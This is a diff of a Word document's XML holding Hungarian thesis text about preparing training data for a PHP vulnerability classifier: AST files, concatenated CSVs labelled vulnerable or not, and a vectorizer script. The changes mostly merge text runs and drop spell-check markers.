-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az irodalomjegyzék [11] eleme segítségével</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A PHP fájl</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">okhoz generált </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST fák</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a</w:t>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mappábában </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">közel </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>azonos névvel helyezked</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nek </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>el</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17041,105 +15244,15 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mappábában </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">közel </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>azonos névvel helyezked</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">nek </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>el</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>txt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> kiterjesztéssel.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>txt kiterjesztéssel.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17227,33 +15340,15 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>tanulo_adatok</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
@@ -17381,66 +15476,34 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>\</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>AST</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> mappa .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>txt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> kiterjesztésű fájljait</w:t>
+        <w:t xml:space="preserve"> mappa .txt kiterjesztésű fájljait</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17494,49 +15557,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> („</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kind</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>”, „</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>name</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>”, „</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>raw</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>”)</w:t>
+        <w:t xml:space="preserve"> („kind”, „name”, „raw”)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17602,21 +15623,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>azonos nevű .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>csv</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> kiterjesztésű fájlok</w:t>
+        <w:t>azonos nevű .csv kiterjesztésű fájlok</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17759,33 +15766,15 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>tanulo_adatok</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
@@ -17861,21 +15850,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> következő lépésben a .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>csv</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fájlokat </w:t>
+        <w:t xml:space="preserve"> következő lépésben a .csv fájlokat </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17954,17 +15929,29 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>\</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>AST</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
@@ -17972,15 +15959,69 @@
         </w:rPr>
         <w:t>\</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>concatenate</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>d.csv fájlba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, majd </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">manuálisan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>felcímkézem őket</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nnak duplikáltjában, a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>tanulo_adatok</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
@@ -18007,43 +16048,144 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>concatenate</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>d.csv fájlba</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, majd </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">manuálisan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>felcímkézem őket</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nnak duplikáltjában, a</w:t>
+        <w:t>concatenated_title</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.csv</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-ben</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az összefűzés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> egyszerű oka, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az összes </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv viszonylatában</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> csak a saját</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>jában.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Így a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vectorizer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.py</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18053,6 +16195,54 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>már a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>összefűzött</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és felcí</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kézett </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
@@ -18091,14 +16281,14 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>concatenated_title</w:t>
+        <w:t>concatenated</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>d</w:t>
+        <w:t>_titled</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18111,247 +16301,6 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>-ben</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sor</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Az összefűzés</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> egyszerű oka, hogy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az összes </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>csv</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> viszonylatában</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> csak a saját</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>jában.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Így a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>vectorizer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>már a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>összefűzött</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>és felcí</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">kézett </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>concatenated</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>_titled</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.csv</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>-t dolgozza fel.</w:t>
       </w:r>
       <w:r>
@@ -18370,22 +16319,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">olyan </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> olyan </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>numpy</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18459,21 +16400,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>__</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>__</w:t>
+        <w:t>__init__</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18487,7 +16414,6 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18496,7 +16422,6 @@
         </w:rPr>
         <w:t>Vectorizer</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18539,7 +16464,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18548,7 +16472,6 @@
         </w:rPr>
         <w:t>filename</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18585,7 +16508,6 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
